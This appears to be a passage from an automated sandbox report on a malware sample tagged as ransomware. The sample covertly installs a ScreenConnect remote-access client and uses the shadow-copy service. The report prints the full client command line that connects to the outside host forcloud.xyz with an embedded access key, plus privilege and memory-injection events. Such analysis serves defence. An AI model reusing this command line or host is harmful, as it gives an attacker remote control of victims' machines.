Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\B13434442C21EB3002EA01C1FEF0A1FC C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\20ae101cef0f1acf\\" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\ProductIcon = "C:\\Windows\\Installer\\{27FF5BC2-C647-2B99-83BE-DDEA87E94140}\\DefaultIcon" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\2CB5FF72746C99B238EBDDAE789E1404 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\PackageName = "setup.msi" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\Version = "402718729" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2256 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe C:\Windows\SysWOW64\msiexec.exe
PID 2256 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe C:\Windows\SysWOW64\msiexec.exe
PID 2256 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe C:\Windows\SysWOW64\msiexec.exe
PID 2256 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe C:\Windows\SysWOW64\msiexec.exe
PID 2256 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe C:\Windows\SysWOW64\msiexec.exe
PID 2256 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe C:\Windows\SysWOW64\msiexec.exe
PID 2256 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe C:\Windows\SysWOW64\msiexec.exe
PID 2908 wrote to memory of 2996 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2908 wrote to memory of 2996 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2908 wrote to memory of 2996 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2908 wrote to memory of 2996 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2908 wrote to memory of 2996 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2908 wrote to memory of 2996 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2908 wrote to memory of 2996 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2996 wrote to memory of 2964 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\rundll32.exe
PID 2996 wrote to memory of 2964 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\rundll32.exe
PID 2996 wrote to memory of 2964 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\rundll32.exe
PID 2996 wrote to memory of 2964 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\rundll32.exe
PID 2996 wrote to memory of 2964 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\rundll32.exe
PID 2996 wrote to memory of 2964 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\rundll32.exe
PID 2996 wrote to memory of 2964 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\rundll32.exe
PID 2908 wrote to memory of 2236 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2908 wrote to memory of 2236 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2908 wrote to memory of 2236 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2908 wrote to memory of 2236 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2908 wrote to memory of 2236 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2908 wrote to memory of 2236 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2908 wrote to memory of 2236 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2908 wrote to memory of 2004 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2908 wrote to memory of 2004 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2908 wrote to memory of 2004 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2908 wrote to memory of 2004 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2908 wrote to memory of 2004 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2908 wrote to memory of 2004 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2908 wrote to memory of 2004 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2108 wrote to memory of 2072 N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe
PID 2108 wrote to memory of 2072 N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe
PID 2108 wrote to memory of 2072 N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe
PID 2108 wrote to memory of 2072 N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe

"C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 5C29DD8C86517DFCD91C05D0DF17F412 C

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSICCD1.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259509893 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\DrvInst.exe

DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "0000000000000528" "0000000000000538"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding A7853CBA27FEFCF5DC54A76EC1857646

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding DBF948C7C9C0247417A48442C2D91ADE M Global\MSI0000

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe

"C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=forcloud.xyz&p=8041&s=eef8a2dd-7cdd-4d96-ac88-046f110ebda2&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&t=JacekK&c=PL&c=&c=&c=&c=&c=&c=&c="

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe

"C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "1822f744-8df6-4c3d-b674-6fab8b91cc3f" "User"

Network

Country Destination Domain Proto
US 8.8.8.8:53 forcloud.xyz udp

Files

C:\Users\Admin\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi

C:\Users\Admin\AppData\Local\Temp\MSICCD1.tmp

\Users\Admin\AppData\Local\Temp\MSICCD1.tmp-\Microsoft.Deployment.WindowsInstaller.dll

\Users\Admin\AppData\Local\Temp\MSICCD1.tmp-\ScreenConnect.InstallerActions.dll

\Users\Admin\AppData\Local\Temp\MSICCD1.tmp-\ScreenConnect.Core.dll

\Users\Admin\AppData\Local\Temp\MSICCD1.tmp-\ScreenConnect.Windows.dll

C:\Windows\Installer\MSI2EDE.tmp

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\app.config

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\system.config

C:\Config.Msi\f7829a2.rbs

\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsAuthenticationPackage.dll

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsCredentialProvider.dll

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.en-US.resources

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.resources

\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe.config
